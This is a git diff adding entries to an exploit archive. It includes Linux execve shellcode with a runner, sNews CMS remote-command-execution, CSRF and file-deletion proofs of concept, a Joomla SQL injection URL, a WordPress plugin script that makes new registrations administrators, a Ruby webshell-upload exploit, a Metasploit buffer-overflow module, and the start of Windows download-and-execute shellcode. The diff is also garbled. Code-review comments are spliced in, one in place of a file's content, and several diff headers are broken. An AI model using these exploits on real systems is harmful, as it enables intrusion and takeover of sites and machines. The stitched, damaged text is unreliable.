diff --git a/files.csv b/files.csv
index 7000cdc82..64eb884ac 100755
--- a/files.csv
+++ b/files.csv
@@ -20050,7 +20050,7 @@ id,file,description,date,author,platform,type,port
 22810,platforms/php/webapps/22810.txt,"pMachine 1.0/2.x Search Module Cross-Site Scripting Vulnerability",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0
 22811,platforms/bsd/local/22811.c,"Abuse-SDL 0.7 Command-Line Argument Buffer Overflow Vulnerability",2003-06-19,Matrix_DK,bsd,local,0
 22812,platforms/php/webapps/22812.txt,"WebJeff Filemanager 1.6 File Disclosure Vulnerability",2003-06-20,"Adam Stephens",php,webapps,0
-22813,platforms/linux/local/22813.c,"Linux Kernel 2.2. / 2.4.x - /proc Filesystem Potential Information Disclosure Vulnerability",2003-06-20,IhaQueR,linux,local,0
+22813,platforms/linux/local/22813.c,"Linux Kernel 2.2.x / 2.4.x - /proc Filesystem Potential Information Disclosure Vulnerability",2003-06-20,IhaQueR,linux,local,0
 22814,platforms/linux/dos/22814.txt,"GNU GNATS 3.0 02 PR-Edit Command Line Option Heap Corruption Vulnerablity",2003-06-21,"dong-h0un U",linux,dos,0
 22815,platforms/linux/local/22815.c,"GNU GNATS 3.113 Environment Variable Buffer Overflow Vulnerability",2003-06-21,Xpl017Elz,linux,local,0
 22816,platforms/windows/dos/22816.txt,"Symantec Security Check RuFSI ActiveX Control Buffer Overflow Vulnerability",2003-06-23,"Cesar Cerrudo",windows,dos,0
@@ -36156,3 +36156,14 @@ id,file,description,date,author,platform,type,port
 39971,platforms/php/webapps/39971.php,"phpATM 1.32 - Remote Command Execution (Shell Upload) on Windows Servers",2016-06-17,"Paolo Massenio",php,webapps,80
 39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80
 39973,platforms/linux/remote/39973.rb,"op5 v7.1.9 Configuration Command Execution",2016-06-17,metasploit,linux,remote,443
+39974,platforms/php/webapps/39974.html,"WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80
+39975,platforms/lin_x86-64/shellcode/39975.c,"Linux x86_64 execve Shellcode - 15 bytes",2016-06-20,CripSlick,lin_x86-64,shellcode,0
+39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80
+39977,platforms/php/webapps/39977.txt,"Joomla BT Media (com_bt_media) Component - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
+39978,platforms/php/webapps/39978.php,"Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80
+39979,platforms/windows/shellcode/39979.c,"Windows XP - 10 - Download & Execute Shellcode",2016-06-20,B3mB4m,windows,shellcode,0
+39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (msf)",2016-06-20,s0nk3y,windows,local,0
+39981,platforms/php/webapps/39981.html,"Airia - (Add Content) CSRF",2016-06-20,HaHwul,php,webapps,80
+39982,platforms/php/webapps/39982.rb,"Airia - Webshell Upload Exploit",2016-06-20,HaHwul,php,webapps,80
+39983,platforms/php/webapps/39983.txt,"Symphony CMS 2.6.7 - Session Fixation",2016-06-20,hyp3rlinx,php,webapps,80
+39984,platforms/windows/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - (0PatchServicex64.exe) Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,windows,local,0
diff --git a/platforms/lin_x86-64/shellcode/39975.c b/platforms/lin_x86-64/shellcode/39975.c
new file mode 100755
index 000000000..ce0a55720
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/39975.c
@@ -0,0 +1,48 @@
+#include
+#include
+
+// OS-20614
+// eben_s_dowling@georgiasouthern.edu
+
+/*
+global _start
+
+_start:
+
+execve:
+
+ mov rsi, rax
+ mov rdx, rsi
+
+ mov r12 , 0x68732f6e69622f
+ push r12
+ push rsp
+ pop rdi
+ mov al, 0x3b
+ syscall
+*/
+
+
+
+unsigned char code[] = \
+ "\x48\x89\xc6" // mov %rax,%rsi
+ "\x48\x89\xf2" // mov %rsi,%rdx
+ "\x49\xbc\x2f\x62\x69\x6e\x2f" // movabs $0x68732f6e69622f,%r12
+ "\x73\x68\x00"
+ "\x41\x54" // push %r12
+ "\x54" // push %rsp
+ "\x5f" // pop %rdi
+ "\xb0\x3b" // mov $0x3b,%al
+ "\x0f\x05" // syscall
+;
+
+main()
+{
+
+ printf("Shellcode Length: %d\n", (int)strlen(code));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+
+}
\ No newline at end of file
diff --git a/platforms/linux/local/22813.c b/platforms/linux/local/22813.c
index 51eb8627d..dcb388887 100755
--- a/platforms/linux/local/22813.c
+++ b/platforms/linux/local/22813.c
@@ -1,6 +1,7 @@
-source: http://www.securityfocus.com/bid/8002/info
+/* source: http://www.securityfocus.com/bid/8002/info
 A potential information disclosure vulnerability has been reported for the Linux /proc filesystem, specifically when invoking setuid applications. As a result, an unprivileged user may be able to read the contents of a setuid application's environment data. This could potentially, although unlikely, result in the disclosure of sensitive information, such as restricted file path information.
+*/
 /**************************************************************** * *
diff --git a/platforms/php/webapps/39974.html b/platforms/php/webapps/39974.html
new file mode 100755
index 000000000..96eab0e00
--- /dev/null
+++ b/platforms/php/webapps/39974.html
@@ -0,0 +1,114 @@
+
+
+
+
+
+
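Review bot: `printf("Shellcode Length: %d\n", (int)strlen(code));` under-reports the array: the `movabs` immediate ends in `"\x73\x68\x00"`, so `strlen` stops at that embedded NUL and prints 15 while `code[]` actually holds 24 bytes; the array size is the right measure, `printf("Shellcode Length: %zu\n", sizeof code - 1);`. The "15 bytes" in the files.csv title appears to have been copied from that output. `main()` with no return type relies on implicit int, which C99 removed and current compilers reject; declare it `int main(void)`. The two `#include` directives carry no header name in this rendering; if that is how the file was committed it does not compile, and `<stdio.h>` plus `<string.h>` are presumably what was meant for `printf` and `strlen`.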
+ +
+
+
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/39976.txt
new file mode 100755
index 000000000..44705152d
--- /dev/null
+++ b/platforms/php/webapps/39976.txt
@@ -0,0 +1,227 @@ +[+] Credits: hyp3rlinx + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: +http://hyp3rlinx.altervista.org/advisories/SNEWS-RCE-CSRF-XSS.txt + +[+] ISR: APPARITIONSEC + + +Vendor: +============ +snewscms.com + + +Product: +================ +sNews CMS v1.7.1 + + +Vulnerability Type: +=================================== +Persistent Remote Command Execution +Cross Site Request Forgeries (CSRF) +Persistent XSS + + +CVE Reference: +============== +N/A + + +Vulnerability Details: +====================== + +If an authenticated user happens to stumble upon an attackers webpage or +click an infected link they have a chance to get the following prizes, + +1) Persistent Remote Code Execution +2) Cross Site Request Forgeries +3) Persistent XSS + + +sNews has feature that allows PHP functions to be inserted for articles by +authenticated users under "Edit Article". However, there is no +CSRF token/checks to prevent unauthorized HTTP requests to be made on +behalf of that user. Furthermore, these commands will get stored in MySQL +database in the 'articles' table. So each time that sNews webpage is +visited it will execute. + +e.g. + +CSRF / RCE Under "Edit Article" Admin area. + +[func]system:|:"calc.exe"[/func] + +On line no 3270 of "snews.php" there is no input filtering allowing +arbitrary system calls. + +$returned = call_user_func_array($func[0], explode(',',$func[1])); + +//////////////////////////////////////////////////////////////////////////////////////////// + + +CSRF / Hijack SNews CMS accounts, the username however must be known in +advance, if known then that lucky user wins a changed password!. + + +//////////////////////////////////////////////////////////////////////////////////////////// + + +CSRF / arbitrary file deletion, we can delete arbitrary files in the +webroot which we can use to bypass access controls like ".htaccess" file. +allowing attackers to read/access files from those affected directories. 
+ +On line 3080 "snews.php" direct usage of untrusted user input into the PHP +"unlink" function which deletes any files the attacker wants. + +if (isset($_GET['task']) == 'delete') { +$file_to_delete = $_GET['folder'].'/'.$_GET['file']; +@unlink($file_to_delete); +echo notification(0,'','snews_files'); + + +/////////////////////////////////////////////////////////////////////////////////////////// + + +Persistent XSS entry point also exists in same "Edit Article" Admin area, +but why bother when we have RCE option. + + +Exploit code(s): +=============== + +Remote Command Execution pop "calc.exe" POC. + +
+ + + + + + + + + + + + + + + + + + + + + + +
+ + +After we make HTTP request for the booby trapped article and KABOOM. + +http://localhost/snews1.7.1/uncategorized/remote-command-execution/ + + +CSRF - Account Hijack +===================== + +
+ + + + + + +
+ + +CSRF - Arbitrary File Deletion +=============================== + +1) Create file in htdocs / web root as a test e.g. "DELETEME.php" + +2) Visit following URL as authenticated user. + +http://localhost/snews1.7.1/?action=snews_files&task=delete&folder=Patches +Log&file=../../../DELETEME.php + +3) Files gone! + + + +Persistent XSS +=============== + +
+ + + + + + + + + + + + + + + + + + + + + + +
+ + + + +Disclosure Timeline: +================================= +Vendor Notification: No Replies +June 19, 2016 : Public Disclosure + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +================ +Critical +CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N + + +Description: +================================================ +Request Method(s): [+] GET / POST + +Vulnerable Product: [+] snews v1.7.1 +=========================================== + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author +prohibits any malicious use of security related information +or exploits by the author or elsewhere. + +by hyp3rlinx diff --git a/platforms/php/webapps/39977.txt b/platforms/php/webapps/39977.txt new file mode 100755 index 000000000..6cf028df7 --- /dev/null +++ b/platforms/php/webapps/39977.txt 
@@ -0,0 +1,26 @@
+######################
+# Exploit Title : Joomla com_bt_media - SQL Injection
+# Exploit Author : Persian Hack Team
+# Vendor Homepage : http://extensions.joomla.org/extension/bt-media-gallery
+# Category: [ Webapps ]
+# Tested on: [ Win ]
+# Version: 1.0
+# Date: 2016/06/19
+######################
+#
+# PoC:
+
+# categories[0]= Parameter Vulnerable To SQL
+
+# Demo :
+
+# http://server/index.php?option=com_bt_media&view=list&categories[0]=%277&Itemid=134
+
+
+# Please Free Yaser Ebrahimi
+
+######################
+# Discovered by : Mojtaba MobhaM
+# Greetz : T3NZOG4N & FireKernel & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members
+# Homepage : persian-team.ir
+######################
\ No newline at end of file
diff --git a/platforms/php/webapps/39978.php
new file mode 100755
index 000000000..01939c06d
--- /dev/null
+++ b/platforms/php/webapps/39978.php
@@ -0,0 +1,183 @@ + + * Vendor Homepage: http://aa-team.com/ + * Software Link: http://codecanyon.net/item/premium-seo-pack-wordpress-plugin/6109437?s_rank=2 + * Version: 1.9.1.3 + * Tested on: Debian 8, PHP 5.6.17-3 + * Type: Authenticated (customer, subscriber) wp_options overwrite + * Time line: Found [05-Jun-2016], Vendor notified [05-Jun-2016], Vendor fixed: [???], [RD:1] + */ + + +require_once('curl.php'); +//OR +//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php'); +$curl = new CurlWrapper(); + + +$options = getopt("t:m:u:p:a:",array('tor:')); +echo "Current Options:\n"; +print_r($options); +for($i=4;$i>0;$i--){ + echo "Starting in $i \r"; + sleep(1); +} +echo "Starting.... \r"; +echo "\n"; + +$options = validateInput($options); + +if (!$options){ + showHelp(); +} + +if ($options['tor'] === true) +{ + echo " ### USING TOR ###\n"; + echo "Setting TOR Proxy...\n"; + $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/"); + $curl->addOption(CURLOPT_PROXYTYPE,7); + echo "Checking IPv4 Address\n"; + $curl->get('https://dynamicdns.park-your-domain.com/getip'); + echo "Got IP : ".$curl->getResponse()."\n"; + echo "Are you sure you want to do this?\nType 'wololo' to continue: "; + $answer = fgets(fopen ("php://stdin","r")); + if(trim($answer) != 'wololo'){ + die("Aborting!\n"); + } + echo "OK...\n"; +} + + +function logIn(){ + global $curl, $options; + file_put_contents('cookies.txt',"\n"); + $curl->setCookieFile('cookies.txt'); + $curl->get($options['t']); + $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In'); + $curl->post($options['t'].'/wp-login.php', $data); + $status = $curl->getTransferInfo('http_code'); + if ($status !== 302){ + echo "Login probably failed, aborting...\n"; + echo "Login response saved to login.html.\n"; + die(); + } + file_put_contents('login.html',$curl->getResponse()); +} + +function exploit(){ + global $curl, $options; + if ($options['m'] == 
'admin_on') { + echo "Setting default role on registration to Administrator\n"; + /* Getting a nonce */ + $data = array('action'=>'pspLoadSection', 'section'=>'setup_backup'); + $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); + $resp = $curl->getResponse(); + $resp = json_decode($resp,true); + preg_match_all('~id="box_nonce" name="box_nonce" value="([a-f0-9]{10})"~', $resp['html'], $mat); + if (!isset($mat[1])){ + die("Failed getting box_nonce\n"); + } + $nonce = $mat[1][0]; + $new_settings = array('default_role'=>'administrator', 'users_can_register'=>1); + $new_settings = urlencode(json_encode($new_settings)); + echo "Sending settings to update\n"; + $data = array('action'=>'pspInstallDefaultOptions', 'options'=>'box_id=psp_setup_box&box_nonce='.$nonce.'&install_box='.$new_settings); + $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); + $resp = $curl->getResponse(); + $resp = json_decode($resp,true); + if (@$resp['status'] == 'ok'){ + echo "Admin mode is ON, go ahead an register yourself an Admin account! \n"; + } else { + echo "Setting admin mode failed \n"; + } + echo "Raw response: " . $curl->getResponse() . 
"\n"; + } + if ($options['m'] == 'admin_off') { + + echo "Setting default role on registration to Subscriber\n"; + /* Getting a nonce */ + $data = array('action'=>'pspLoadSection', 'section'=>'setup_backup'); + $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); + $resp = $curl->getResponse(); + $resp = json_decode($resp,true); + preg_match_all('~id="box_nonce" name="box_nonce" value="([a-f0-9]{10})"~', $resp['html'], $mat); + if (!isset($mat[1])){ + die("Failed getting box_nonce\n"); + } + $nonce = $mat[1][0]; + $new_settings = array('default_role'=>'subscriber', 'users_can_register'=>0); + $new_settings = urlencode(json_encode($new_settings)); + echo "Sending settings to update\n"; + $data = array('action'=>'pspInstallDefaultOptions', 'options'=>'box_id=psp_setup_box&box_nonce='.$nonce.'&install_box='.$new_settings); + $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); + $resp = $curl->getResponse(); + $resp = json_decode($resp,true); + if (@$resp['status'] == 'ok'){ + echo "Admin mode is OFF \n"; + } + echo "Raw response: " . $curl->getResponse() . "\n"; + } +} + + +logIn(); +exploit(); + + + +function validateInput($options){ + + if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){ + return false; + } + if ( !isset($options['u']) ){ + return false; + } + if ( !isset($options['p']) ){ + return false; + } + if (!preg_match('~/$~',$options['t'])){ + $options['t'] = $options['t'].'/'; + } + if (!isset($options['m']) || !in_array($options['m'], array('admin_on','admin_off') ) ){ + return false; + } + if ($options['m'] == 'tag' && !isset($options['a'])){ + + } + $options['tor'] = isset($options['tor']); + + return $options; +} + + +function showHelp(){ + global $argv; + $help = << + @link http://github.com/svyatov/CurlWrapper + @license http://www.opensource.org/licenses/mit-license.html MIT License + +EOD; + echo $help."\n\n"; + die(); +} 
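Review bot: The nonce check in `exploit()` never fires: after `preg_match_all(...)`, `$mat[1]` is always set (an empty array when nothing matched), so `!isset($mat[1])` is false and `$mat[1][0]` then produces an undefined-offset notice with `$nonce` left null; `if (empty($mat[1]))` is the test that was meant, in both the `admin_on` and the `admin_off` branch. Those two branches are the same twenty-odd lines apart from the values in `$new_settings` and the success message, so one private helper taking the role and the register flag would halve the function. In `validateInput()`, `if ($options['m'] == 'tag' && !isset($options['a'])) { }` is an empty body behind a condition that cannot hold once `m` has been restricted to `admin_on`/`admin_off` a few lines earlier, and should be removed. `$answer = fgets(fopen ("php://stdin","r"));` in the tor block opens a handle that is never closed.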
diff --git a/platforms/php/webapps/39981.html
new file mode 100755
index 000000000..b3915d7ad
--- /dev/null
+++ b/platforms/php/webapps/39981.html
@@ -0,0 +1,22 @@
+
+
+ + + + + + + +
+
+
diff --git a/platforms/php/webapps/39982.rb
new file mode 100755
index 000000000..511e5112c
--- /dev/null
+++ b/platforms/php/webapps/39982.rb
@@ -0,0 +1,70 @@
+# Exploit Title: Airia - Webshell Upload Vulnerability
+# Date: 2016-06-20
+# Exploit Author: HaHwul
+# Exploit Author Blog: www.hahwul.com
+# Vendor Homepage: http://ytyng.com
+# Software Link: https://github.com/ytyng/airia/archive/master.zip
+# Version: Latest commit
+# Tested on: Debian [wheezy]
+
+require "net/http"
+require "uri"
+
+if ARGV.length !=2
+puts "Airia Webshell Upload Exploit(Vulnerability)"
+puts "Usage: #>ruby airia_ws_exploit.rb [targetURL] [phpCode]"
+puts " targetURL(ex): http://127.0.0.1/vul_test/airia"
+puts " phpCode(ex): echo 'zzzzz'"
+puts " Example : ~~.rb http://127.0.0.1/vul_test/airia 'echo zzzz'"
+puts " exploit & code by hahwul[www.hahwul.com]"
+
+else
+
+target_url = ARGV[0] # http://127.0.0.1/jmx2-Email-Tester/
+shell = ARGV[1] # PHP Code
+exp_url = target_url + "/editor.php"
+uri = URI.parse(exp_url)
+http = Net::HTTP.new(uri.host, uri.port)
+
+request = Net::HTTP::Post.new(uri.request_uri)
+request["Accept"] = "*/*"
+request["User-Agent"] = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
+request["Connection"] = "close"
+request["Referer"] = "http://127.0.0.1/vul_test/airia/editor.php?file=1&group=%281%20AND%20%28SELECT%20SLEEP%2830%29%29%29%20--%20"
+request["Accept-Language"] = "en"
+request["Content-Type"] = "application/x-www-form-urlencoded"
+request.set_form_data({"mode"=>"save",""=>"","file"=>"shell.php","scrollvalue"=>"","contents"=>"","group"=>"vvv_html"})
+response = http.request(request)
+
+puts "[Result] Status code: "+response.code
+puts "[Result] Open Browser: "+target_url+"/data/vvv_html/shell.php"
+end
+
+=begin
+### Run Step.
+
+#> ruby 3.rb http://127.0.0.1/vul_test/airia "echo 123;"
+[Result] Status code: 302
+[Result] Open Browser: http://127.0.0.1/vul_test/airia/data/vvv_html/shell.php
+
+output: Airia Webshell Exploit123
+
+### HTTP Request / Response
+[Request]
+POST /vul_test/airia/editor.php HTTP/1.1
+Host: 127.0.0.1
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Referer: http://127.0.0.1/vul_test/airia/editor.php?file=1&group=%281%20AND%20%28SELECT%20SLEEP%2830%29%29%29%20--%20
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 65
+Cookie: W2=dgf6v5tn2ea8uitvk98m2tfjl7; DBSR_session=01ltbc0gf3i35kkcf5f6o6hir1; __utma=96992031.1679083892.1466384142.1466384142.1466384142.1; __utmb=96992031.2.10.1466384142; __utmc=96992031; __utmz=96992031.1466384142.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
+
+mode=save&file=1.php&scrollvalue=&contents=&group=vvv_html
+
+[Response] Uloaded file
+http://127.0.0.1/vul_test/airia/data/vvv_html/1.html
+=end
+
diff --git a/platforms/php/webapps/39983.txt
new file mode 100755
index 000000000..5f9d0fa62
--- /dev/null
+++ b/platforms/php/webapps/39983.txt
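Review bot: The comment on `target_url = ARGV[0] # http://127.0.0.1/jmx2-Email-Tester/` names a different project from the one the usage text advertises (`http://127.0.0.1/vul_test/airia`) and reads as a leftover from another script; it should be dropped or made to match. The bodies of `if ARGV.length !=2 ... else ... end` are written at column 0, so the branch boundaries are only visible from the keywords; two-space indentation inside each branch is the Ruby convention and would make the structure readable at a glance.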
@@ -0,0 +1,145 @@ +[+] Credits: John Page aka hyp3rlinx + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: +http://hyp3rlinx.altervista.org/advisories/SYMPHONY-CMS-SESSION-FIXATION.txt + +[+] ISR: APPARITIONSEC + + +Vendor: +==================== +www.getsymphony.com + + +Product: +================== +Symphony CMS v2.6.7 + +Download: +http://www.getsymphony.com/download/ + + +Symphony is a XSLT-powered open source content management system. + + +Vulnerability Type: +=================== +Session Fixation + + +CVE Reference: +============== +CVE-2016-4309 + + +Vulnerability Details: +===================== + +Symphony CMS is prone to "Session Fixation" allowing attackers to preset a +users PHPSESSID "Session Identifier". +If the application is deployed using an insecure setup with PHP.INI +"session.use_only_cookies" not enabled, attackers can then send +victims a link to the vulnerable application with the "PHPSESSID" already +initialized as Symphony does not use or call +"session_regenerate_id()" upon successful user authentication. + +Note: as per php.net/manual/en/session.configuration.php +"session.use_only_cookies=1" is default since PHP 4.3.0. + +e.g. + +"http://localhost/symphony/?PHPSESSID=APPARITION666". + +As Symphonys Session ID is not regenerated it can result in arbitrary +Session ID being 'Fixated' to a user, if that user authenticates using +this attacker supplied session fixated link, the attacker can now access +the affected application from a different Computer/Browser +and have the same level of access to that of the victim. Default Cookie +lifetime for Symphony CMS is up to two weeks. + + + +Reproduction steps: +===================== + +Edit PHP.INI and change following settings to 'session.use_only_cookies=0' +if applicable, as POC test. 
+ + +1) Telnet localhost 80 + +2) make HTTP request with a prefixed PHPSESSID + +GET /symphony-2.6.7/symphony/?PHPSESSID=PWN3D666 HTTP/1.1 +Host: localhost +Connection: close + +3) Hit enter twice + + +HTTP/1.1 200 OK +Date: Mon, 16 May 2016 02:06:47 GMT +Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1l PHP/5.6.8 +X-Powered-By: PHP/5.6.8 +Set-Cookie: PHPSESSID=PWNED666; expires=Mon, 30-May-2016 02:06:48 GMT; +Max-Age=1209600; path=/symphony-2.6.7; httponly +Content-Length: 1501 +Connection: close +Content-Type: text/html; charset=UTF-8 + + +Exploit code(s): +=============== + +1) +http://localhost/symphony-2.6.7/symphony/publish/articles/?PHPSESSID=hyp3rlinx + +2) http://localhost/symphony-2.6.7/symphony/?PHPSESSID=APPARITION + + +Disclosure Timeline: +===================================== +Vendor Notification: May 3, 2016 +Vendor Release Fix: May 23, 2016 +June 20, 2016 : Public Disclosure. + + +Exploitation Method: +==================== +Remote + + +Severity Level: +================ +6.8 (Medium) +CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N + + + +Description: +============================================== +Request Method(s): [+] GET / POST + + +Vulnerable Product: [+] Symphony CMS 2.6.7 + + +Vulnerable Parameter(s): [+] 'PHPSESSID' +=============================================== + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. 
The author
+prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
+
+hyp3rlinx
diff --git a/platforms/windows/local/39980.rb
new file mode 100755
index 000000000..6b5813903
--- /dev/null
+++ b/platforms/windows/local/39980.rb
@@ -0,0 +1,72 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = GoodRanking
+
+ include Msf::Exploit::FILEFORMAT
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Tomabo M3U SEH Based Stack Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack over flow in Tomabo MP4 Player <= 3.11.6. When
+ the application is used to open a specially crafted m3u file, an buffer is overwritten allowing
+ for the execution of arbitrary code.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'yokoacc', # Proof of concept
+ 'nudragn', # Proof of concept
+ 'rungga_reksya', # Proof of concept
+ 'rahmat_nurfauzi' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'EDB', '38486' ],
+ [ 'URL', 'http://www.tomabo.com/mp4-player/download.html'],
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'seh',
+ 'StackAdjustment' => -3500,
+ 'DisableNops' => 'True',
+ },
+ 'Payload' =>
+ {
+ 'Space' => 1800,
+ 'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x1a\x20"
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Tomabo MP4 Player <= 3.11.6', { 'Ret' => 0x00401CA9 } ],
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Oct 18 2015',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),
+ ], self.class)
+ end
+
+ def exploit
+ sploit = rand_text_alpha_upper(1028)
+ sploit << "\xeb\x08\x90\x90" # short jump 8 bytes
+ sploit << [target.ret].pack('V') # universal
+ sploit << "\x90" * 16
+ sploit << payload.encoded
+ sploit << "\x44" * 436
+
+ playlist = sploit
+ print_status("Creating '#{datastore['FILENAME']}' file ...")
+
+ file_create(playlist)
+ end
+end
\ No newline at end of file
diff --git a/platforms/windows/local/39984.txt
new file mode 100755
index 000000000..e67d4948b
--- /dev/null
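Review bot: The `'Description'` text has two wording errors that end up in the module listing: `stack over flow` should be `stack overflow` and `an buffer is overwritten` should be `a buffer is overwritten`. `register_options([...], self.class)` uses the older two-argument form; current framework modules call `register_options(opts)` without the owner argument, so the `self.class` can be dropped when this is updated. `'DisableNops' => 'True'` passes the flag as a string where sibling modules use the boolean `true`; the framework presumably coerces it, but the boolean is the conventional spelling.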
+++ b/platforms/windows/local/39984.txt 
@@ -0,0 +1,63 @@ + +ACROS Security 0patch (0PatchServicex64.exe) Unquoted Service Path Privilege Escalation + + +Vendor: ACROS, d.o.o. +Product web page: https://www.0patch.com +Affected version: 2016.05.19.539 + +Summary: 0patch (pronounced 'zero patch') is a platform for instantly +distributing, applying and removing microscopic binary patches to/from +running processes without having to restart these processes (much less +reboot the entire computer). + +Desc: The application suffers from an unquoted search path issue impacting +the service '0patchservice' for Windows deployed as part of 0patch solution. +This could potentially allow an authorized but non-privileged local user to +execute arbitrary code with elevated privileges on the system. A successful +attempt would require the local user to be able to insert their code in the +system root path undetected by the OS or other security applications where +it could potentially be executed during application startup or reboot. If +successful, the local user’s code would execute with the elevated privileges +of the application. 
+ +Tested on: Microsoft Windows 7 Ultimate SP1 (EN) + Microsoft Windows 7 Professional SP1 (EN) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5331 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5331.php + +Vendor: https://0patch.blogspot.com/2016/06/new-release-0patch-agent-20160614850.html + + +08.06.2016 + +-- + + +C:\>sc qc 0patchservice +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: 0patchservice + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\0patch\Agent\0PatchServicex64.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : 0patch Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\>cacls "C:\Program Files (x86)\0patch\Agent\0PatchServicex64.exe" +C:\Program Files (x86)\0patch\Agent\0patchServicex64.exe NT AUTHORITY\SYSTEM:(ID)F + BUILTIN\Administrators:(ID)F + BUILTIN\Users:(ID)R + + +C:\> diff --git a/platforms/windows/shellcode/39979.c b/platforms/windows/shellcode/39979.c new file mode 100755 index 000000000..48a600e1c --- /dev/null +++ b/platforms/windows/shellcode/39979.c 
@@ -0,0 +1,147 @@ +/* +[+] Author : B3mB4m +[~] Contact : b3mb4m@protonmail.com +[~] Project : https://github.com/b3mb4m/shellsploit-framework +[~] Greetz : Bomberman,T-Rex,Pixi +----------------------------------------------------------- + +Tested on : + Windows XP/SP3 x86 + Windows 7 Ultimate x64 + Windows 8.1 Pro Build 9600 x64 + Windows 10 Home x64 + + +* This source belongs to shellsploit project under MIT licence. + +* If you convert it an executable file, its will be FUD(without any encrypt). + -PoC : https://nodistribute.com/result/qwxU3DmFCR2M0OrQt + + + + 0x0: 31c9 xor ecx, ecx + 0x2: b957696e45 mov ecx, 0x456e6957 + 0x7: eb04 jmp 0xd + 0x9: 31c9 xor ecx, ecx + 0xb: eb00 jmp 0xd + 0xd: 31c0 xor eax, eax + 0xf: 31db xor ebx, ebx + 0x11: 31d2 xor edx, edx + 0x13: 31ff xor edi, edi + 0x15: 31f6 xor esi, esi + 0x17: 648b7b30 mov edi, dword ptr fs:[ebx + 0x30] + 0x1b: 8b7f0c mov edi, dword ptr [edi + 0xc] + 0x1e: 8b7f1c mov edi, dword ptr [edi + 0x1c] + 0x21: 8b4708 mov eax, dword ptr [edi + 8] + 0x24: 8b7720 mov esi, dword ptr [edi + 0x20] + 0x27: 8b3f mov edi, dword ptr [edi] + 0x29: 807e0c33 cmp byte ptr [esi + 0xc], 0x33 + 0x2d: 75f2 jne 0x21 + 0x2f: 89c7 mov edi, eax + 0x31: 03783c add edi, dword ptr [eax + 0x3c] + 0x34: 8b5778 mov edx, dword ptr [edi + 0x78] + 0x37: 01c2 add edx, eax + 0x39: 8b7a20 mov edi, dword ptr [edx + 0x20] + 0x3c: 01c7 add edi, eax + 0x3e: 89dd mov ebp, ebx + 0x40: 81f957696e45 cmp ecx, 0x456e6957 + 0x46: 